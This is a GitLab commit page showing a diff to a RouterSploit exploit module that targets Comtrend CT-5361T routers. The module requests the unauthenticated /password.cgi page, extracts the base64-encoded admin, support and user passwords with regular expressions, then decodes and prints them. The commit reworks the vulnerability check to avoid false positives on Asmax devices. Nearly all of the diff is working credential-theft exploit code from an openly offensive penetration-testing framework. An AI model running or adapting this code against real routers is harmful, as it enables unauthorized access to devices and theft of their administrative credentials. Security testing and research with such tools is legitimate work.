Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
af188ee4
Commit
af188ee4
authored
9 years ago
by
Marcin Bury
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Fixing false positive for asmax ar 1004g devices.
parent
42342469
master
…
v3.4.4
v3.4.3
v3.4.2
v3.4.0
v3.3.0
v3.2.0
v3.1.0
v3.0.0
v2.2.1
v2.2.0
v2.1.0
No related merge requests found
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
40 additions
and
28 deletions
+40
-28
ct_5361t_password_disclosure.py
...modules/exploits/comtrend/ct_5361t_password_disclosure.py
+40
-28
No files found.
routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py
View file @
af188ee4
...
...
@@ -38,34 +38,34 @@ class Exploit(exploits.Exploit):
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
def
run
(
self
):
url
=
sanitize_url
(
"{}:{}/password.cgi"
.
format
(
self
.
target
,
self
.
port
))
if
self
.
check
():
url
=
sanitize_url
(
"{}:{}/password.cgi"
.
format
(
self
.
target
,
self
.
port
))
print_status
(
"Requesting for {}"
.
format
(
url
))
print_status
(
"Requesting for {}"
.
format
(
url
))
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
is
None
:
return
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
is
None
:
return
creds
=
[]
admin
=
re
.
findall
(
"pwdAdmin = '(.+?)'"
,
response
.
text
)
if
len
(
admin
):
creds
.
append
((
'Admin'
,
b64decode
(
admin
[
0
])))
support
=
re
.
findall
(
"pwdSupport = '(.+?)'"
,
response
.
text
)
if
len
(
support
):
creds
.
append
((
'Support'
,
b64decode
(
support
[
0
])))
user
=
re
.
findall
(
"pwdUser = '(.+?)'"
,
response
.
text
)
if
len
(
user
):
creds
.
append
((
'User'
,
b64decode
(
user
[
0
])))
if
len
(
creds
):
print_success
(
"Credentials found!"
)
headers
=
(
"Login"
,
"Password"
)
print_table
(
headers
,
*
creds
)
print
(
"NOTE: Admin is commonly implemented as root"
)
regexps
=
[(
"admin"
,
"pwdAdmin = '(.+?)'"
),
(
"support"
,
"pwdSupport = '(.+?)'"
),
(
"user"
,
"pwdUser = '(.+?)'"
)]
creds
=
[]
for
regexp
in
regexps
:
res
=
re
.
findall
(
regexp
[
1
],
response
.
text
)
if
len
(
res
):
creds
.
append
((
regexp
[
0
],
b64decode
(
res
[
0
])))
if
len
(
creds
):
print_success
(
"Credentials found!"
)
headers
=
(
"Login"
,
"Password"
)
print_table
(
headers
,
*
creds
)
print
(
"NOTE: Admin is commonly implemented as root"
)
else
:
print_error
(
"Credentials could not be found"
)
else
:
print_error
(
"
Credentials could not be found
"
)
print_error
(
"
Device seems to be not vulnerable
"
)
@mute
def
check
(
self
):
...
...
@@ -75,7 +75,19 @@ class Exploit(exploits.Exploit):
if
response
is
None
:
return
False
# target is not vulnerable
if
any
(
map
(
lambda
x
:
x
in
response
.
text
,
[
"pwdSupport"
,
"pwdUser"
,
"pwdAdmin"
])):
return
True
# target vulnerable
regexps
=
[
"pwdAdmin = '(.+?)'"
,
"pwdSupport = '(.+?)'"
,
"pwdUser = '(.+?)'"
]
for
regexp
in
regexps
:
res
=
re
.
findall
(
regexp
,
response
.
text
)
if
len
(
res
):
try
:
b64decode
(
res
[
0
])
# checking if data is base64 encoded
except
:
return
False
# target is not vulnerable
else
:
return
False
# target is not vulnerable
return
False
# target is not
vulnerable
return
True
# target is
vulnerable
This diff is collapsed.
Click to expand it.
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment